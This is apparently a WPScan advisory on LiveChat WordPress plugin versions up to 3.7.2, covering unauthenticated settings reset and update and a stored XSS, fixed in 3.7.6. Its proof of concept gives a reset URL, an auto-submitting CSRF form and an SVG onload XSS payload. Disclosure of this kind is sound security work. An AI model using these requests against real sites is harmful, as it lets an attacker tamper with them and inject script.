LiveChat <= 3.7.2 - Unauthenticated Option Update/Reset and Stored XSS



Description
The lack of proper CSRF and Authorisation checks could allow an unauthenticated attacker to update or reset the plugin's settings. Furthermore, when updating the livechat_email option, no sanitisation is performed, leading to a Stored XSS issue in the plugin's settings page.

CSRF and XSS fixed in 3.7.3, however the authorisation part added an is_admin() (which only check if the dashboard or admin panel is trying to be displayed) check. Fixed in 3.7.6
Proof of Concept
Unauthenticated Option Reset:
https://<BLOG>/wp-admin/admin-ajax.php?reset=1&page=livechat_settings

Unauthenticated Option Update (make sure the Referer of the request contains livechat_settings, for example "Referer: livechat_settings"):

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="licenseNumber" value="42"/>
      <input type="hidden" name="licenseEmail" value="whatever"/>
    </form>
  </body>
</html>

Unauthenticated Stored XSS:
Like the PoC above, but replace the licenseEmail value by "><svg/onload=alert(/XSS/)>

Affects Plugin

fixed in version 3.7.6

References

URL https://plugins.trac.wordpress.org/changeset?reponame=&new=2113080%40wp-live-chat-software-for-wordpress&old=2103185%40wp-live-chat-software-for-wordpress

Classification

Type MULTI

Miscellaneous

Views 2283
Verified No
WPVDB ID 9441

Timeline

Publicly Published 2019-06-26 (4 months ago)
Added 2019-07-09 (3 months ago)
Last Updated 2019-08-14 (2 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin